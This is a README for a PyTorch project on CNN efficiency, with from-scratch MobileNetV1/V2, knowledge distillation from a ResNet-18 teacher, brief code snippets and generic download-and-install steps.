
πŸš€ pytorch-mobilenet-efficiency - Explore CNN Model Efficiency

πŸ“₯ Quick Download

Download Here

πŸ“– Description

Welcome to the pytorch-mobilenet-efficiency project! This application lets you explore the efficiency of Convolutional Neural Networks (CNNs). It includes from-scratch implementations of MobileNetV1 and MobileNetV2 and showcases model compression through knowledge distillation: a lightweight MobileNetV2 (the student model) is trained with guidance from a larger ResNet-18 (the teacher model).
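The student/teacher setup described above is usually trained with the standard Hinton-style distillation loss. The sketch below is an illustration of that loss, not the project's exact code; the temperature T and weighting alpha are assumed defaults that the repository may set differently:

```python
import torch
import torch.nn.functional as F

def distillation_loss(student_logits, teacher_logits, labels, T=4.0, alpha=0.9):
    """Hinton-style knowledge distillation loss.

    Combines a soft-target term (KL divergence between temperature-softened
    teacher and student distributions) with the usual hard-label cross entropy.
    """
    soft = F.kl_div(
        F.log_softmax(student_logits / T, dim=1),
        F.softmax(teacher_logits / T, dim=1),
        reduction="batchmean",
    ) * (T * T)  # rescale gradients to match the hard-label term
    hard = F.cross_entropy(student_logits, labels)
    return alpha * soft + (1 - alpha) * hard
```

During training, the teacher runs in `eval()` mode under `torch.no_grad()` to produce `teacher_logits`, and only the student's parameters are updated.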

πŸš€ Getting Started

Follow the steps below to download and run the software.

πŸ“‹ System Requirements

  • Operating System: Windows 10 or later, or any Linux distribution
  • RAM: At least 4 GB recommended
  • Disk Space: Minimum 500 MB free space
  • Python: Version 3.6 or later

πŸ› οΈ Installation Steps

  1. Visit the Downloads Page
    Go to the Releases page to find the latest version of the software.

  2. Choose the Right Package
    Look for the release that suits your operating system. For Windows, download the .zip package. For Linux, download the .tar.gz archive.

  3. Download the File
    Click on the link for the release to initiate the download. Your browser will download the file to your default downloads folder.

  4. Extract the Files
    Once the download completes, navigate to your downloads folder. If you downloaded a .zip file, right-click it and select "Extract All". For a .tar.gz archive, use an archive manager or run tar -xzf on the file.

  5. Open the Command Line or Terminal

    • For Windows, search for "Command Prompt" in the Start menu.
    • For Linux, open the Terminal application.
  6. Navigate to the Extracted Folder
    Use the following command:

    cd path_to_extracted_folder

    Replace path_to_extracted_folder with the actual path where you extracted the files.

  7. Install Required Packages
    Install the necessary Python packages. Run this command:

    pip install -r requirements.txt
  8. Run the Application
    After the installation is complete, you can start the application by executing:

    python main.py

    Replace main.py with the repository's entry-point script if it is named differently.

πŸ“‚ Features

  • Efficient Models: Experience the capabilities of MobileNetV1 and MobileNetV2.
  • Knowledge Distillation: Understand how a lightweight model can learn from a larger model.
  • User-Friendly Interface: Designed for users without extensive programming knowledge.
  • Extensive Documentation: Comprehensive guides and examples to help you get started.
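The efficiency highlighted above comes from depthwise separable convolutions, the building block MobileNetV1 is composed of: a per-channel 3x3 convolution followed by a 1x1 pointwise convolution, which needs far fewer multiply-adds than a full 3x3 convolution. A minimal PyTorch sketch of the block (an illustration under common conventions, not the project's exact implementation):

```python
import torch
import torch.nn as nn

class DepthwiseSeparableConv(nn.Module):
    """MobileNetV1-style block: depthwise 3x3 conv + pointwise 1x1 conv,
    each followed by batch norm and ReLU."""
    def __init__(self, in_ch, out_ch, stride=1):
        super().__init__()
        # groups=in_ch makes the 3x3 conv operate on each channel independently
        self.depthwise = nn.Conv2d(in_ch, in_ch, 3, stride, 1, groups=in_ch, bias=False)
        self.bn1 = nn.BatchNorm2d(in_ch)
        # 1x1 conv mixes information across channels
        self.pointwise = nn.Conv2d(in_ch, out_ch, 1, bias=False)
        self.bn2 = nn.BatchNorm2d(out_ch)
        self.relu = nn.ReLU(inplace=True)

    def forward(self, x):
        x = self.relu(self.bn1(self.depthwise(x)))
        return self.relu(self.bn2(self.pointwise(x)))
```

For a 3x3 kernel this factorization cuts the multiply-add count by roughly 8-9x compared with a standard convolution of the same input/output channels.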

πŸŽ“ Learn More

Explore topics like:

  • CNN basics and applications
  • Comparative analysis of model efficiency
  • Importance of hyperparameters in machine learning
  • Transfer learning with MobileNet models

πŸ“„ Additional Resources

πŸ’¬ Support

If you encounter issues or have questions, feel free to raise them in the Issues section.

πŸ“₯ Download & Install

For detailed instructions on how to download the latest release, please visit the Releases page.
